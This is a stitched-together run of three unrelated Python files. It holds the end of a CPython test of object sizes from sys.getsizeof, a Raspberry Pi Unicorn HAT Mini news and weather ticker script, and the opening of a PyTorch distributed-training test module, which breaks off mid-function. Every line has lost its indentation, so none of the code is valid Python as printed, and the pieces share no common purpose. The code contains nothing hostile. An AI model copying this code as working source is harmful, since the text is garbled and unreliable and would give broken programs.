check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('n2P' + '2nPn' + 8*'n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('n2P' + '2nPn') + 16*struct.calcsize('n2P'))
# dictionary-keyiterator
check({}.keys(), size('P'))
# dictionary-valueiterator
check({}.values(), size('P'))
# dictionary-itemiterator
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# memoryview
check(memoryview(b''), size('Pnin 2P2n2i5P Pn'))
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('nP'))
check(frozenset(sample), s + newsize*struct.calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
s = vsize('P2n15Pl4Pn9Pn11PIP')
check(int, s)
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs + 4P)
s = vsize('P2n17Pl4Pn9Pn11PIP') + struct.calcsize('34P 3P 10P 2P 4P')
# Separate block for PyDictKeysObject with 4 entries
s += struct.calcsize("2nPn") + 4*struct.calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('n2P' + '2nPn'))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
uticker.py
|
#!/usr/bin/env python
import logging
import config
import tickersources
import threading
import time
from datetime import datetime as dt
from colorsys import hsv_to_rgb
from PIL import ImageFont
from scrollable import Scrollable
from unicornhatmini import UnicornHATMini
import os
dir = os.path.dirname(__file__)
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', level=logging.DEBUG)
tickercontent={}
#prepare the unicornhat for display
unicornhatmini = UnicornHATMini()
def update_content():
global tickercontent
logging.info('Updating content...')
content = {}
font = ImageFont.truetype(os.path.join(dir, config.general["font"]), 8)
shape = (17,7)
if (config.weather["enabled"]):
content["weather"] = Scrollable("weather",tickersources.get_weather(),tickersources.config.weather["color"],font,shape)
if (config.trends["enabled"]):
content["twitter"] = Scrollable("twitter",tickersources.get_trends(),tickersources.config.trends["color"],font,shape)
if (config.exchange["enabled"]):
content["exchange"] = Scrollable("exchange",tickersources.get_exchange(),tickersources.config.exchange["color"],font,shape)
if (config.news["enabled"]):
content["news"] = Scrollable("news",tickersources.get_news(),tickersources.config.news["color"],font,shape)
tickercontent = content
logging.debug("Content updated:" + "{0}".format(content))
def content_loop():
logging.info('Content update loop started')
while True:
time.sleep(config.general["data_refresh"])
update_content()
def dim_brightness():
global unicornhatmini
if (config.general["night_mode"]):
currenthour = dt.now().hour
logging.info('Current Hour: %d ' , currenthour )
if( (currenthour > config.general["day_starts"]) and (currenthour < config.general["night_starts"]) ):
unicornhatmini.set_brightness(config.general["brightness"])
logging.debug('setting the daytime brigthness.')
else:
unicornhatmini.set_brightness(config.general["night_brightness"])
logging.debug('setting the nighttime brigthness.')
def set_screen_pixels(image,offset_x, offset_y, color):
global unicornhatmini
display_width, display_height = unicornhatmini.get_shape()
(r, g, b) = color
for y in range(display_height):
for x in range(display_width):
if image.getpixel((x + offset_x, y+offset_y)) == 255:
unicornhatmini.set_pixel(x, y, r, g, b)
else:
unicornhatmini.set_pixel(x, y, 0, 0, 0)
def main():
global unicornhatmini
global tickercontent
logging.info("Starting ..:: uticker ::..")
#get the initial content
logging.info("Getting the initial content to display")
update_content()
#kick-off the content update loop
logging.info("Kicking off the content loop")
content_thread = threading.Thread(target=content_loop, args=())
content_thread.start()
#content_thread.join()
logging.debug("Initial Display setup")
# Uncomment the below if your display is upside down
# (e.g. if you're using it in a Pimoroni Scroll Bot)
unicornhatmini.set_rotation(config.general["rotate"])
# Dial down the brightness
dim_brightness()
# Delay is the time (in seconds) between each pixel scrolled
delay = config.general["delay"]
logging.info("initial set-up done")
logging.info("Entering the main loop, for uticker.")
while True:
loop_start = time.time()
display_width, display_height = unicornhatmini.get_shape()
unicornhatmini.clear()
#dim brightness check each loop
dim_brightness()
color = (255,0,0)
logging.debug("random color %s",color)
for key in tickercontent.keys():
content = tickercontent[key]
logging.debug('scroll content %s - with %d lines', content.category, len(content.lengths))
#1. get the content and the imagebuffer
image = content.image
color = content.color
#2. get the content and start looping over lines
for i in range(len(content.lengths)):
linelength = content.lengths[i]
#3. Lift content effect per each line, start with a lift
#reset the x offset and start rolling the line up
offset_x = 0
offset_y = i*display_height*2
logging.debug('lifting y_offset %d ', offset_y)
while offset_y <= i*display_height*2+display_height:
set_screen_pixels(image,offset_x,offset_y,color)
offset_y += 1
unicornhatmini.show()
time.sleep(delay)
#wait a bit longer after lifting the line for better visualisation
time.sleep(delay*10)
#4. Scroll the content until the length
offset_x = 0
offset_y = (2*i + 1 )*display_height
logging.debug('scrolling x_offset %d and y_offset %d', offset_x, offset_y)
while offset_x + display_width < linelength:
set_screen_pixels(image,offset_x,offset_y,color)
offset_x += 1
unicornhatmini.show()
time.sleep(delay)
logging.info("Finished scrolling full content in %d seconds", time.time()- loop_start)
if __name__ == "__main__":
main()
|
test_c10d_common.py
|
# Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as dist
if not dist.is_available():
print("distributed package not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed.distributed_c10d as c10d
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
dist.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
dist.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
def _test_warn_not_in_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
in_group_ranks = list(filter(lambda x: x % 2 == 0, range(self.world_size)))
group = dist.new_group(in_group_ranks)
x = torch.zeros(2, 2).cuda(self.rank)
xs = [torch.zeros(2, 2).cuda(self.rank) for _ in range(len(in_group_ranks))]
if self.rank not in in_group_ranks:
msg = ".*{}.*does not belong to.*"
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_gather")):
dist.all_gather(xs, x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_reduce")):
dist.all_reduce(x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("barrier")):
dist.barrier(group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("broadcast")):
dist.broadcast(x, src=0, group=group)
else:
dist.all_gather(xs, x, group=group)
dist.all_reduce(x, group=group)
dist.barrier(group=group)
dist.broadcast(x, src=0, group=group)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_debug_level(self):
try:
del os.environ["TORCH_DISTRIBUTED_DEBUG"]
except KeyError:
pass
dist.set_debug_level_from_env()
# Default should be off
default_debug_mode = dist.get_debug_level()
self.assertEqual(default_debug_mode, dist.DebugLevel.OFF)
mapping = {
"OFF": dist.DebugLevel.OFF,
"off": dist.DebugLevel.OFF,
"oFf": dist.DebugLevel.OFF,
"INFO": dist.DebugLevel.INFO,
"info": dist.DebugLevel.INFO,
"INfO": dist.DebugLevel.INFO,
"DETAIL": dist.DebugLevel.DETAIL,
"detail": dist.DebugLevel.DETAIL,
"DeTaIl": dist.DebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
dist.set_debug_level_from_env()
set_debug_mode = dist.get_debug_level()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "The value of TORCH_DISTRIBUTED_DEBUG must"):
dist.set_debug_level_from_env()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def barrier(self, opts=None):
store = c10d._get_default_store()
